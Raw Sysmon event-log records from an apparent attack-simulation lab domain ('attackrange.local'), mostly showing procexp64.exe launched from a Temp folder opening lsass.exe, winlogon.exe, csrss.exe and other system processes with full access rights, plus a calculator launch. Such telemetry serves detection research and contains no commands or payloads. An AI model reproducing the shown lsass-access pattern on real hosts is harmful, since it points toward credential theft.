15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790002Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.814{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790001Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.814{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790000Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.517{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789999Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.517{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789998Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789997Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789996Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789995Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789994Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789993Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789992Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789991Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789990Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789989Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.501{732C744F-3255-6010-D3A2-00000000A301}60926772C:\Windows\system32\calc.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x8000000000000000789988Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.498{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXE"C:\Windows\System32\win32calc.exe" C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7,IMPHASH=83A6FF176255FE0F3F902360860DA5F8{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\System32\calc.execalc.exe 10341000x8000000000000000789987Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.439{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789986Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.439{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789985Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a16b7|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 